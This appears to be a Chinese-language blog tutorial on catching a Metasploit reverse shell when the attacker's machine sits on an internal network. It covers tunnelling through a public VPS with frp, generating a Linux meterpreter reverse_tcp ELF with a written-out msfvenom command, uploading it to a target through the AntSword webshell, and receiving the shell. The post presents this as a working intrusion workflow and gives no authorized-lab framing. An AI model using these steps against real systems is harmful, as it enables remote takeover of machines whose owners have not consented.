关于处于内网环境的msf接收反向连接shell的教程。
内网渗透两位主流工具无非cs与msf,cobaltstrike与msf不一样,它的teamserver直接部署在外网ip上,做攻击使用连接方便,而msf没有。
-
大家的MSF也几乎都是处于虚拟机中的内网环境,攻击的用处也大都是和cobaltstrike传递shell做后渗透。
-
但是,当我们的主动攻击目标是外网机器,或者说是不同且不通的内网环境,这种情况,我们该如何去接收反向的shell连接呢。
网上搜索关于msf教程,也通常都是在内网中做的演示,但是在渗透过程中不乏会遇到需要利用msf的exploit进行漏洞利用的过程,文章应运而生,文章创作目的意在帮助需要的小伙伴。
使用到的
- frp
- 公网vps
- xshell
- 蚁剑
一,frp的配置,使其可以互通
首先在内网kali和自己的vps上下载好frp,没钱买vps就去用提供端口转发的第三方服务,网上太多了。
简单配置一下
vps,frps配置
内网kali,frpc配置
连接vps的7000端口通信,并且把本地的2222端口映射到vps的8000端口
接下来测试一下连通性:
连通是成功的。
注意:如果遇到ping通可以,但是nc不能通信,大家可以多换一个端口尝试。
二,生成msf的木马
最简单的命令生成一个
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=外网IP LPORT=外网端口 -f elf > /test/shell.elf
留意这个监听payload:linux/x64/meterpreter/reverse_tcp
之后把shell.elf下载到本地,再通过蚁剑上传到目标机器
三,启动frp进行流量转发
四,开启msf的监听,等待上线
这个时候注意默认的payload,是跟我们生成木马时使用的不一样,原则上用什么监听模式生成木马,就用什么监听模式接受反弹shell,所以要改成一样的。
我们选择监听本地,之所以是2222端口,因为我们前面讲到转发的本地端口是2222
run
目标机运行上传的shell.elf
成功接收到了shell
OK 结束
这是执行载荷去接收shell的案例,其实用执行命令反弹shell的话(比如ms17010),(不只是MSF)还有一些原理和实现方法是一样的,主要是端口转发。
另一方面,对一部分人来说,这种方法的作用某种情况下确确实实是多余的,可能是我的学习方式跟大家不大相同,刹那间的突发奇想,自己也就研究了一下,也是希望能帮助到想到这个问题的小伙伴。
- 有问题随时私信。